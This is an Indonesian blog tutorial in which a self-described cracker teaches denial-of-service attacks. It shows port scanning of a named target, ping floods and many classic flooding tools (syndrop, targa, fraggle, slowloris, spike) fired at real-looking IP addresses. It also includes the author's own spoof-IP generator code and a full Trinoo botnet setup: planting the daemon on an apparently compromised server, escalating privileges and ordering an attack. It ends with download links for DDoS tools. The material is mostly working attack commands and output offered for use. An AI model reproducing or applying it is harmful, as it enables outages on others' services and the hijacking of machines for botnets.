THOUSANDS OF FREE BLOGGER TEMPLATES

Senin, 30 Mei 2011

DOS / DDOS ala Cracker+ ardiantz.com Web based denial of service Tool

Yup untuk melengkapi artikel kali ini ane sediain web based denial of service tool yang bisa dipake langsung, silahkan kunjungi:

http://ardiantz.com/~checking/.dos_tool

Web based Denial of service tool version 1,made by mywisdom



Yup kembali lagi bersama saya mywisdom kali ini tentang teknik serangan
favorit ala cracker jaman dulu (termasuk saya sendiri seorang cracker) yaitu Remote DOS dan DDOS.
Perhatikan perbedaan DDOS dan DOS:
- ddos dilakukan dari banyak zombie kita yaitu mesin-mesin yang sudah kita owned dan bisa dimanfaatkan untuk serangan
- dos adalah serangan yang berasal hanya dari 1 mesin saja!!!

Sebelum melakukan DOS atau DDOS Anda wajib mengetahui port - port daemon
yang terbuka di target kita, misal kita menggunakan nmap port scanner untuk target kita sec-r1z.com, satu hal yang wajib diingat oleh tiap cracker (nama domain sec-r1z.com hanyalah sekedar contoh)
yang ingin melakukan dos maupun ddos adalah sebaiknya tidak menyerang alamat ip target tapi menyerang domain / hostname karena alamat ip bisa diubah sewaktu-waktu untuk menhindari dos maupun ddos.
Sebelum ddos maupun dos mari kita scan daemon -daemon yang terbuka untuk
celah bagi kita menyerang, berikut ini contoh penggunaan scanning port dengan nmap:


Code:
bt ~ # nmap -A sec-r1z.com -PN

Starting Nmap 4.60 ( http://nmap.org ) at 2010-03-22 04:33 GMT
Interesting ports on 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86):
Not shown: 1668 closed ports, 36 filtered ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      PureFTPd
|_ Anonymous FTP: FTP: Anonymous login allowed
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
25/tcp   open  smtp     Exim smtpd 4.69
|  SMTP: Responded to EHLO command
|  b0x.sec-r1z.com Hello example.org [111.94.9.19]
|  SIZE 52428800
|  PIPELINING
|  AUTH PLAIN LOGIN
|  STARTTLS
|  250 HELP
|  Responded to HELP command
|  Commands supported:
|_ AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp   open  domain
110/tcp  open  pop3     Courier pop3d
143/tcp  open  imap     Courier Imapd (released 2008)
443/tcp  open  http     Apache httpd 2.0.63
|_ HTML title: Site doesn't have a title.
465/tcp  open  ssl/smtp Exim smtpd 4.69
|  SSLv2: server still supports SSLv2
|_      the server didn't offer any cyphers
993/tcp  open  ssl/imap Courier Imapd (released 2008)
|  SSLv2: server still supports SSLv2
|_      the server didn't offer any cyphers
995/tcp  open  ssl/pop3 Courier pop3d
|  SSLv2: server still supports SSLv2
|_      the server didn't offer any cyphers
3306/tcp open  mysql    MySQL 5.0.90-community
|  MySQL Server Information: Protocol: 10
|  Version: 5.0.90-community
|  Thread ID: 9230
|  Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
|  Status: Autocommit
|_ Salt: @Te"s?}zn9nA:?l"cM6e
Device type: storage-misc
Running (JUST GUESSING) : BlueArc embedded (91%)
Aggressive OS guesses: BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: b0x.sec-r1z.com

TRACEROUTE (using port 21/tcp)
HOP RTT    ADDRESS
1   0.09   192.168.153.2
2   280.82 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.436 seconds
bt ~ #
Ok dari hasil scan ke sec-r1z.com kita bisa lihat kalau port-port berikut ini terbuka sehingga memungkinkan serangan kita:
Code:
21
22
25
53
110
143
443
465
993
995
3306
Jadi kita bisa menggempur target kita ke semua port tersebut.

Tips!!!
Agar DDOS lebih efektif sebaiknya serang semua port daemon yang terbuka
dan bagi yg port 80 open serangan difokuskan lebih ke port 80.


Aneka Tool & Teknik Untuk DOS / DDOS

Asiknya ICMP ATTACK
Ok selanjutnya kita bisa juga melakukan pengujian apakah box tersebut bisa
kita serang dengan icmp packets:
Code:
bt ~ # ping sec-r1z.com
PING sec-r1z.com (74.63.241.86) 56(84) bytes of data.
64 bytes from 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): icm=10 ttl=128 time=273 ms

[2]+  Stopped                 ping sec-r1z.com
bt ~ #
Ok kita bisa melihat ketika kita ping sec-r1z.com dan ipnya diresolve ke 74.63.241.86 dan juga direply langsung olehnya :
reply 64 bytes dari 74.63.241.86 yang menandakan kita bisa menambahkan efek serangan icmp ke target kita.

Contoh Teknik dasar untuk melakukan ping flood dari root shell unix atau linux kita, ketikkan ini (misal target host adalah sec-r1z.com):
Code:
ping sec-r1z.com -fs 50000
PING sec-r1z.com (74.63.241.86) 50000(50028) bytes of data.
.......................................................
[3]+  Stopped                 ping sec-r1z.com -fs 50000

Asiknya SYN Attack

syn attack merupakan salah satu metode penyerangan favorit attacker jaman dulu yang memanfaatkan kelemahan three way handsake.
Salah satu tool yang biasa saya pakai untuk syn attack adalah synhose, Di mana synhose ini akan melakukan spoof random ip untuk mengirimkan paket ke target kita, sehingga seolah olah di target kita menerima banyak serangan dari ip yang berbeda.
SEcara default jika tidak diset di argumen maka synhose akan menyerang port 80, bisa kita liat di sourcenya:
Code:
if(port == 0) port = 80;
Misal kita akan menyerang sec-r1z.com di port terbuka 80 dari 10 spoof ip berbeda berikut ini contohnya:
Code:
bt ~ # ./synhose sec-r1z.com 80 10
SynHose [A random source IP syn flooder]
Written by knight / Idea by   : rza

Destination  : sec-r1z.com
Port         : 80
NumberOfTimes: 10

SynHosing sec-r1z.com at port 80 from 108.248.253.31 port 2884
SynHosing sec-r1z.com at port 80 from 248.36.16.139 port 4
SynHosing sec-r1z.com at port 80 from 68.48.179.170 port 409
SynHosing sec-r1z.com at port 80 from 5.54.172.218 port 9780
SynHosing sec-r1z.com at port 80 from 156.228.227.167 port 5327
SynHosing sec-r1z.com at port 80 from 108.99.240.141 port 1746
SynHosing sec-r1z.com at port 80 from 242.249.38.240 port 924
SynHosing sec-r1z.com at port 80 from 111.233.60.127 port 4544
SynHosing sec-r1z.com at port 80 from 60.194.164.239 port 4234
SynHosing sec-r1z.com at port 80 from 174.243.162.91 port 8044
bt ~ #
dari result di atas komputer kita mengirimkan paket syn ke sec-r1z.com dengan port tujuan 80 dari berbagai ip, misal yang terakhir dari spoof ip 174.243.162.91 melalui port 8044.

Hanya dari 10 ip tentu kurang sedap bukan?? mari kita serang dari 10000 ip berbeda:
Code:
bt ~ # ./synhose sec-r1z.com 80 10000
ooopssssss )

Juno
Juno merupakan syn attack tool yang cukup terkenal, berikut ini adalah contoh cara pakainya (misal target adalah sec-r1z.com di port 80):
Code:
bt ~ # ./juno sec-r1z.com 80
juno.c by Sorcerer of DALnet
death to 74.63.241.86:80




syndrop

Syndrop merupakan tool yang mengabungkan syn attack dan teardrop,berikut ini adalah contoh penggunaan syndrop dengan target host sec-r1z:
Code:
bt ~ # ./syndrop 127.0.0.1 sec-r1z.com -s 31337 -t 80 -n 99999999 -S 20 -E 9999
syndrop by PineKoan
Death on flaxen wings:
From:       127.0.0.1.31337
  To:    74.63.241.86.   80
 Amt: 99999999
[ b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b0




--------------------------------------------------------------------------


Jolt



Jika dilihat dari source codenya,Jolt merupakan salah satu tool untuk DOS yang akan mengirimkan paket icmp ke target kita, Pada jaman dahulu kala jolt ini banyak digunakan untuk membekukan server - server windows
jenis serangan adalah pengiriman paket icmp
Code:
icmp->type = ICMP_ECHO;
Berikut ini demo penggunaan jolt:
Code:
bt ~ # ./jolt 74.63.241.86 127.0.0.1 99999999
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
..................dst


Targa

Targa merupakan tool dos yang merupakan kombinasi dari tool2 ini:

* bonk by route|daemon9 & klepto
* jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
* land by m3lt
* nestea by humble & ttol
* newtear by route|daemon9
* syndrop by PineKoan
* teardrop by route|daemon9
* winnuke by _eci

header2 file yang digunakan oleh targa cukup repot juga dan tidak ada di backtrack secara default, jadi saya tambahkan sendiri, berikut ini header file saya di /usr/include/netinet sehingga berhasil mengkompile targa.c:
Code:
bt netinet # ls
ether.h  if_ether.h  if_tr.h  in.h        ip.h   ip_icmp.h  ip_udp.h    protocols.h  udp.h
icmp6.h  if_fddi.h   igmp.h   in_systm.h  ip6.h  ip_tcp.h   protocol.h  tcp.h
bt netinet #

Misal kita ingin menyerang seluruh range ip dari range ip 74.63.241.86-74.63.241.88


Berikut ini adalah contohnya:
Code:
bt ~ # ./targa 74.63.241.86 74.63.241.88 -t 0 -n 999999
                targa 1.0 by Mixter
Leetness on faxen wings:
To: 74.63.241.86 - 74.63.241.88
Repeats: 999999
   Type:     0
74.63.241.86 [ $$$$$$$$$$$$$$$@@@@@@@@@@@@@@@-----....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#####################&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%
opsi -t 0 berarti anda menyerang dengan menggunakan gabungan semua teknik.
opsi -n 999999 merupakan jumlah pengulangan sebanyak 999999


Boink
Merupakan tool yang bisa membuat blue screen of death pada mesin-mesin windows 9x dan nt.
Berikut ini contoh cara penggunaanya:
Code:
bt ~ # ./boink 127.0.0.1 74.63.241.86 80 80 99999999999
(0)74.63.241.86:25->65
(1)74.63.241.86:25->65
(2)74.63.241.86:25->65
(3)74.63.241.86:25->65
(4)74.63.241.86:25->65
(5)74.63.241.86:25->65
(6)74.63.241.86:25->65
(7)74.63.241.86:25->65
(8)74.63.241.86:25->65
(9)74.63.241.86:25->65
(10)74.63.241.86:25->65
(11)74.63.241.86:25->65
(12)74.63.241.86:25->65
(13)74.63.241.86:25->65
(14)74.63.241.86:25->65
(15)74.63.241.86:25->65
(16)74.63.241.86:25->65
(17)74.63.241.86:25->65
(18)74.63.241.86:25->65
(19)74.63.241.86:25->65
(20)74.63.241.86:25->65
(21)74.63.241.86:25->65
(22)74.63.241.86:25->65
(23)74.63.241.86:25->65
(24)74.63.241.86:25->65
(25)74.63.241.86:25->65
dst ...........


Asiknya Smurf & UDP Attack

Smurf attack merupakan teknik penyerangan dengan mengirimkan paket icmp yang dispoof ke target kita

Bloop
Merupakan salah satu tool dos dengan metode smurf attack.
Bloop akan mengirimkan paket icmp spoof secara acak ke target kita untuk membuat mesin target crash.

Berikut ini adalah contoh penggunaan bloop:
Code:
bt ~ # ./bloop 127.0.0.1 sec-r1z.com 99999999
Bloop v 1.0



Status: Connected....packets sent.



Fraggle
Fraggle merupakan tool untuk tipe smurf dos / ddos yang menggunakan suatu file broadcast yang berisi daftar alamat2 ip spoof.

Sebelum menggunakan fraggle kita memerlukan sebuah file broadcast ip spoof, Untuk itu
saya sudah membuat sendiri tool untuk spoof ip generator namanya dimas.c:

filename:dimas.c , programmer: mywisdom
Code:
/*dimas.c random ip generator (public ip and private ip)
version 1.0
c0d3r: mywisdom
greetz:gunslinger,flyff666,kiddies,xtr0nic,whitehat,Danzel and so on
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
void bikin_random_ip()
 {
FILE *dom2;
int a,b,c,d,a2,b2,jum;
dom2=fopen("ip.txt","w+");  
    for(;;)
 {
   srand ( time(NULL) );
      a = rand ()% 255 ;
     
      b = rand ()% 255 ;
     
      c = rand ()% 255 ;
    
      d = rand ()% 255 ;
   
  if ( (a != 10) && (a != 172) && (a != 192)) 
   {      
      if(dom2!=NULL)
       {
         if(a2!=a)
         {   
       fprintf(dom2,"%d.%d.%d.%d\n",a,b,c,d);
         } 
       }
   }

 a2=a;
 }
fclose(dom2);

 }

int main ()
{
bikin_random_ip();
return 0;
}
kompile file di atas dan run untuk membuat file ip spoof dengan nama file: ip.txt

Code:
gcc -o dimas dimas.c
./dimas
Selanjutnya misal target kita sec-r1z.com, contoh penggunaan fraggle untuk menyerang sec-r1z.com:
Code:
bt ~ # ./fraggle sec-r1z.com  ip.txt 2000 900   80 0   99

fraggle.c by TFreak

Flooding sec-r1z.com (. = 25 outgoing packets)
................................................................................
Done!

bt ~ #



TCP Attack
Khusus untuk http ddos banyak tool yang bisa kita pakai
misal:
slowloris

slowloris biasanya khusus digunakan untuk menyerang http port
,keunggulan slowloris adalah hanya menggunakan bandwoth yang kecil dari server attacker,
tool ini akan mengirimkan http request dalam ukuran panjang berupa angka random panjang
terlihat dari source codenya:
Code:
if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }
Contoh penggunaan slowloris untuk menyerang sec-r1z.com :

Code:
bt ~ # ./slowloris.pl -dns www.sec-r1z.com -port 80 -timeout 30 -num 500 -cache

CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc::::
CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc
ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888@8@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
 ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco

 Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Connecting to www.sec-r1z.com:80 every 30 seconds with 500 sockets:
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.


Tembak.c
Ini sih tool buat nuke yang udah lama banget buatan anak echo ) dah ada dari jaman baheula ), ok mari kita coba pakai lagi untuk contoh target sec-r1z.com :
Code:
bt ~ # ./tembak

Kirim Paket ke IP orang

Cara Pake : $ tembak hostname.orang port

bt ~ # ./tembak sec-r1z.com 80

Serbuu....!!!! Hancurkaannn sec-r1z.com ke port 80



httpd_flood.pl
Ini dia nih perl skrip khusus untuk mengantung socket httpd ).khusus hanya menyerang http daemon (port 80)
Berikut ini adalah contoh cara pakainya, misal target tbd.my, misal kita menggunakan lama serangan infinite (selamanya) dan kita run di background di salah satu mesin yang kita root:
Code:
./httpd_flood.pl tbd.my -1 99999 -1 &
Teknik Serangan Gabungan
Teknik serangan gabungan ini menggabungkan aneka jenis serangan, Anda bisa coba tool ini: spike
ok mari kita lihat semua tool2 yang digabung menjadi satu teknik serangan mematikan oleh spike:
Code:
bt spike # ls
README  bin/  sources/  spike.sh*  spike.sh~*
bt spike # ls bin
1234*   conseal*  jolt*   latierra*  orgasm*  spiffit*  teardrop*
beer*   dcd3c*    kkill*  misfrag*   pepsi*   sping*    trash*
boink*  fawx*     koc*    nestea*    pimp*    stream*   udpdata*
bonk*   gewse*    kox*    newtear*   pong*    syndrop*  wingatecrash*
coke*   gewse5*   land*   opentear*  smurf*   synk*
bt spike #
sudah anda lihat kan? tool ini menggabungkan berbagai macam ddos tool menjadi 1
Mari kita coba run tool ini untuk attack target kita misal: sec-r1z.com
Code:
bt spike # ./spike.sh sec-r1z.com
 Main Menu For spike.sh
1] Combo Attacks
2] Pick The Attack
3] Pick The Attack2 (Enter Your Own Info)
4] Class C Attack (Drop A Class C)
5] Never Die (Attacks That Never Die)
6] Clean up (Kill Hung Attacks)
7] Info Menu (Other Info About spike.sh)
8] To Exit Out

Enter The Number Of The Option To Run:
misal kita ingin menggunakan combo attack untuk menyerang target kita
ketikkan 1.

Maka akan muncul pilihan 3 jenis serangan berdasarkan tingkat ganasnya serangan ( kek maen game aja yah hahahaahaha):
Code:
ComboAttack Menu\033[0m
 1] Light Attack   (12 Attacks)
 2] Medium Attack  (20 Attacks)
 3] Hard Attack    (33 Attacks)
 4] To Exit Out

Enter The Number Of The Option To Run
#> \c
Misal kita pilih yang hard attack, ketikkan 3 !!!
Code:
ComboAttack Menu\033[0m
 1] Light Attack   (12 Attacks)
 2] Medium Attack  (20 Attacks)
 3] Hard Attack    (33 Attacks)
 4] To Exit Out

Enter The Number Of The Option To Run
#> \c
3
Teadroping.....
Completed....
Pimping.....
Completed....
Nesteaing.....
Completed....
Misfraging.....
Completed....
Syndroping.....
Completed....
Koxing.....
Completed....
NewTearing.....
Completed....
Bonking.....
Completed....
Fawxing.....
Completed....
Trashing.....
Completed....
Smurfing....
Completed....
Attacking On Hold For BandWidth
Completed....
Boinking.....
Completed....
Conseal Firewall Attacking.....
Completed....
Jolting.....
Completed....
Modem +++ DoSing
dst...



Pembahasan Khusus Tambahan

Trinoo
Trinoo merupakan tool ddos yang sangat populer sejak dulu menggunakan sistem daemon slave sebagai zombie dan master server sebagai pengontrol attack. Ok trinoo ini pada jaman dulu bisa melakukan pengembangan jaringan zombie otomatis dengan scanning range ip poblik lalu melakukan eskploitasi terhadap bug lama wu ftpd , dll untuk dijadikan zombie.
pertama download dulu trinoo dan ekstrak:
Code:
wget http://packetstormsecurity.org/distributed/trinoo.tgz
tar zxvf trinoo.tgz
Mari saya jelaskan isinya trinoo dan gimana cara kerjanya:

Code:
bt trinoo # ls
BENSUQS  daemon/  master/  password  trinoo.tgz
yang ada di folder daemon adalah yang akan kita pasang di zombie kita yaitu mesin2 yang sudah kita owned.

Mengedit dan menyetting daemon trinoo
Untuk mengkompile daemon trinoo ini membutuhkan lib crypt dalam glibc.
Mari kita kompile Daemon trinoo gunakan perintah ini:
Code:
bt daemon # gcc -o ns ns.c -lcrypt
bt daemon #
Source code asli dari compare password pada daemon trinoo adalah:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aIf3YWfOhw.V.")==0) {
Jadi kita bisa melihat bahwa fungsi:
crypt(pass, "aI"), "aIf3YWfOhw.V.")
plain text sebelum di crypt sebenarnya adalah: l44adsl

l44adsl ini adalah password default trinoo

crypt ini adalah one way hash yg tidak bisa didekrip sebenarnya.


di mana sintaks fungsi crypt ini adalah:

char * crypt (const char *key, const char *salt)


di mana daemon trinoo ini default akan bind port 27444/udp dengan default password l44adsl

Misal Anda ingin mengganti default password dan default port untuk daemon trinoo, gunakan tool yang saya buat ini:

Code:
/*Devilzc0de trinoo hash generator
programmer: mywisdom
*/
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *data;

int hasil;
 hasil=crypt(argv[1], "aI");
 printf("trinoo hash anda adalah:%s\n",hasil);
}
Selanjutnya kompile dan jalankan, misal saya ingin mencari hash dari password: mywisdom
Code:
bt ~ # gcc -o trinoo_hash trinoo_hash.c -lcrypt
trinoo_hash.c:13:2: warning: no newline at end of file
bt ~ # ./trinoo_hash mywisdom
trinoo hash anda adalah:aI3Kc25mvwsN2
bt ~ #
ok selanjutnya kita edit source daemon di ns.c di mana kita ganti hash password trinoo tadi yg line ini:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aIf3YWfOhw.V.")==0) {
kita akan ubah menjadi:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aI3Kc25mvwsN2")==0) {
yang berarti password default daemon trinoo telah diganti menjadi: mywisdom

Sedangkan untuk mengganti default port trinoo misal kita mao ubah jadi port: 31337
kita ubah line ini di ns.c:
Code:
sa.sin_port = htons(27444);
menjadi:
Code:
sa.sin_port = htons(31337);

TErakhir jangan lupa setting alamat ip master dengan mengedit line berikut ini diganti alamat ip masternya:
Code:
char *master[] = {
  "129.237.122.40",
  "207.228.116.19",
  "209.74.175.130",
  NULL
penting!!! jangan lupa diganti alamat ip masternya klo gak tar jadi zombie orang!!!!

Selanjutnya kompile ulang daemon trinoo anda:
Code:
gcc -o ns ns.c -lcrypt
Ok selanjutnya silahkan upload dan run ke mesin yang sudah kita owned , misal:
Code:
bt daemon # ftp pcorders.com
Connected to pcorders.com.
220 ns3.pcorders.com FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
Name (pcorders.com:root): mywisdom
331 Password required for mywisdom.
Password:
230 User mywisdom logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put ns
local: ns remote: ns
200 PORT command successful.
553 ns: Permission denied.
ftp> cd /tmp
250 CWD command successful.
ftp> put ns
local: ns remote: ns
200 PORT command successful.
150 Opening BINARY mode data connection for ns.
226 Transfer complete.
10814 bytes sent in 0.00175 secs (6.1e+03 Kbytes/sec)
ftp>                  
ftp> quit
221-You have transferred 10814 bytes in 1 files.
221-Total traffic for this session was 11363 bytes in 1 transfers.
221-Thank you for using the FTP service on ns3.pcorders.com.
221 Goodbye.
bt daemon # telnet pcorders.com
Trying 204.181.205.145...
Connected to pcorders.com.
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.12-20 on an i686
mlogin: mywisdom
Password:
Last login: Wed May  5 02:10:58 from 105.subnet125-160-218.speedy.telkom.net.id
[admin@ns3 admin]$ ptrace
[t@ns3 admin]# cd /tmp
[t@ns3 /tmp]# ./ns
sh: ./ns: Permission denied
[t@ns3 /tmp]# chmod +x ns
[t@ns3 /tmp]# ./ns
Ok sudah run secara demonize di mesin slave kita , mari kita liat bind portnya:
Code:
[t@ns3 /tmp]# netstat -a | grep udp
udp        0      0 *:1161                  *:*
udp        0      0 *:1160                  *:*
udp        0      0 *:1159                  *:*
udp        0      0 *:27444                 *:*
udp      224      0 ns3.pcorders.com:1156   192.168.1.1:domain      ESTABLISHED
udp      224      0 ns3.pcorders.com:1155   192.168.1.1:domain      ESTABLISHED
udp        0      0 *:ntalk                 *:*
udp        0      0 *:talk                  *:*
udp        0      0 *:sunrpc                *:*
[t@ns3 /tmp]#
ok keliatan kan ada listening port udp 27444?
Ok selanjutnya kita compile dan run daemon master di mesin yang kita owned yang mao kita jadikan master slave

Untuk mengganti password default master lakukan langkah yang sama tapi line yg diganti adalah file master.c ini:

#define CRYPTKEY "ZsoTN.cq4X31"

ok misal saya install masternya di alamat ip x.x.x.x:
Code:
http://yoyoparty.com/upload/
mywisdom@trin00-king~#make
gcc -o master master.c blowfish.c -lcrypt
blowfish.c: In function 'blowfish_init':
blowfish.c:131: warning: incompatible implicit declaration of built-in function 'strncpy'
blowfish.c: In function 'encrypt_string':
blowfish.c:192: warning: incompatible implicit declaration of built-in function 'strlen'
blowfish.c:194: warning: incompatible implicit declaration of built-in function 'strcpy'
blowfish.c: In function 'decrypt_string':
blowfish.c:232: warning: incompatible implicit declaration of built-in function 'strlen'
blowfish.c:234: warning: incompatible implicit declaration of built-in function 'strcpy'
strip master
mywisdom@trin00-king~#./master
??
ok instalasi trinoo master di x.x.x.x selesai,selanjutnya untuk mengakses trinoo shell dari localhost attacker :
Code:
mywisdom@trin00-king~#telnet x.x.x.x 27665
Trying x.x.x.x...
Connected to hostxxxxxxxx.
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]


trinoo>
Dalam contoh ini saya menggunakan password default:
betaalmostdone

untuk memerintahkan master slave melakukan ddos ketikkan perintah : dos alamat_ip_target
Code:
trinoo> dos 74.63.241.86
DoS: Packeting 74.63.241.86.
trinoo>
Ok untuk sementara sekian dulu dan terima kasih

aneka compiled tool ddos bisa didownload di
http://yoyoparty.com/upload/ddos_tools.tgz
dan
